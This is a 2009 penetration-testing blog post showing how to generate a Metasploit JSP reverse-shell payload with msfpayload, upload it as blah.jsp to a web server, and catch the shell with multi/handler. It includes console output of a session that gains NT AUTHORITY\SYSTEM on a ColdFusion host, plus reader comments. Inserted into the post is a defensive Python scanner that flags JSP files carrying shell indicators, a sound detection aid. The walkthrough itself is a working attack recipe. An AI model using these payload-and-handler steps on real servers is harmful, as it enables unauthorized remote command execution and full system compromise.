Thursday, October 22, 2009

Metasploit JSP Shells


Stephen Fewer has pushed up a JSP reverse shell and a JSP bind shell.

http://dev.metasploit.com/redmine/projects/framework/repository/show/modules/payloads/singles/java

I'm not sure of all the ways to use them, but the easiest is to output the shell as raw (R) and upload it to a web server. For an example of using one inside an exploit, check out the Adobe RoboHelp exploit.

http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/http/adobe_robohelper_authbypass.rb


yomomma@c0:~/pentest/msf3.3dev$ ./msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.10.1 R > blah.jsp

From there, set up your multi/handler, browse to webpath/blah.jsp on the server and grab your shell.

yomomma@c0:~/pentest/msf3.3dev$ ./msfconsole
=[ msf v3.3-dev [core:3.3 api:1.0]
+ -- --=[ 432 exploits - 261 payloads
+ -- --=[ 21 encoders - 8 nops
=[ 222 aux

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
set PAYLOAD java/jsp_shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.10.1
LHOST => 192.168.10.1
msf exploit(handler) > info

Name: Generic Payload Handler
Version: 6558
Platform: Windows, Linux, Solaris, Unix, OSX, BSD, PHP
Privileged: No
License: Metasploit Framework License (BSD)

Provided by:
hdm

Available targets:
Id Name
-- ----
0 Wildcard Target

Payload information:
Space: 100000
Avoid: 0 characters

Description:
This module is a stub that provides all of the features of the
Metasploit payload system to exploits that have been launched
outside of the framework.

msf exploit(handler) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (java/jsp_shell_reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.10.1 yes The local address
LPORT 4444 yes The local port
SHELL cmd.exe yes The system shell to use.

Exploit target:
Id Name
-- ----
0 Wildcard Target

msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started reverse handler
[*] Command shell session 1 opened ( 192.168.10.1:4444 -> 192.168.10.2:42957)
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\ColdFusion8\runtime\bin>
whoami
whoami
nt authority\system

C:\ColdFusion8\runtime\bin>
exit
exit

[*] Command shell session 1 closed.
CG
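The session above lands as nt authority\system because the JSP runs inside ColdFusion's servlet container, so a .jsp dropped into a JSP-executing webroot inherits the container's service account. The defender's counterpart to this post is to look for such files. The scanner below is an added example, not code from the original post or from Metasploit: it walks a webroot and scores every .jsp/.jspx file on the indicators a JSP reverse or bind shell needs (process execution plus a raw socket or stream pump). The indicator list, weights, the threshold of 4 and the two sample files are assumptions constructed for this example; the "suspicious" sample is only an indicator skeleton with undefined variables, not a working shell.

```python
"""Added example (not from the original post or from Metasploit): scan a
web root for JSP files that carry the building blocks of a JSP reverse or
bind shell, namely process execution plus a raw socket or stream pump.
Indicator names, weights and the threshold are assumptions for this example."""
import os
import re
import tempfile

# Weighted indicators. Each can occur in legitimate code; a JSP that combines
# process execution with a raw socket or a stream pump is what scores high.
INDICATORS = {
    "runtime_exec": (re.compile(r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\("), 3),
    "process_builder": (re.compile(r"new\s+ProcessBuilder\s*\("), 3),
    "raw_socket": (re.compile(r"new\s+(?:java\.net\.)?(?:Server)?Socket\s*\("), 2),
    "stream_pump": (re.compile(r"get(?:Input|Output)Stream\s*\(\s*\)"), 1),
    "request_param": (re.compile(r"request\s*\.\s*getParameter\s*\("), 1),
}
THRESHOLD = 4  # assumed: exec alone (3) is not enough, exec plus a socket is


def score_source(text):
    """Return (score, sorted indicator names) for one JSP source text."""
    hits = sorted(name for name, (pat, _) in INDICATORS.items() if pat.search(text))
    return sum(INDICATORS[name][1] for name in hits), hits


def scan_webroot(root):
    """Walk root and return [(relative path, score, hits)] for JSP files at or
    above THRESHOLD, sorted by path. Paths use '/' regardless of platform."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith((".jsp", ".jspx")):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                score, hits = score_source(fh.read())
            if score >= THRESHOLD:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings.append((rel, score, hits))
    return sorted(findings)


# Constructed samples. The suspicious one is only an indicator skeleton with
# undefined variables and no I/O loop, not a working shell.
BENIGN_JSP = """<%@ page contentType="text/html" %>
<html><body>Hello, <%= request.getParameter("name") %></body></html>
"""

SUSPICIOUS_JSP = """<%@ page import="java.net.*,java.io.*" %>
<%
  Socket s = new Socket(host, port);
  Process p = Runtime.getRuntime().exec(shell);
  InputStream in = p.getInputStream();
%>
"""


def demo():
    """Build a throwaway web root holding both samples and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "uploads"))
        with open(os.path.join(root, "index.jsp"), "w", encoding="utf-8") as fh:
            fh.write(BENIGN_JSP)
        with open(os.path.join(root, "uploads", "blah.jsp"), "w", encoding="utf-8") as fh:
            fh.write(SUSPICIOUS_JSP)
        return scan_webroot(root)


if __name__ == "__main__":
    for rel, score, hits in demo():
        print(f"{rel}: score {score} ({', '.join(hits)})")
```

Run it as a script and it reports only uploads/blah.jsp; in practice point scan_webroot at the container's webapps or wwwroot directory and pair it with modification-time and file-integrity checks, since a static scan only sees what the indicators cover. Note the situation in the comments below: a server with no JSP engine hands the file back as source, so the file is inert there, but it still does not belong in the webroot.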

2 comments:

Fukad said...

Hi! I just have to say great work on this blog! This is the first time I got some problems getting this to work. I start the payload and the multi handler and upload the blah.jsp to my webserver. But when I try to connect with my "victim" machine to "webserver/blah.jsp" I only get the "download window" opened, or in Firefox I get the source code of the .jsp.

What am I doing wrong? Should I make a <script language="javaScript">(blah.jsp) source code</script>? Or what? Keep up the good work, Peace

CG said...

Does the webserver know how to handle .jsp pages?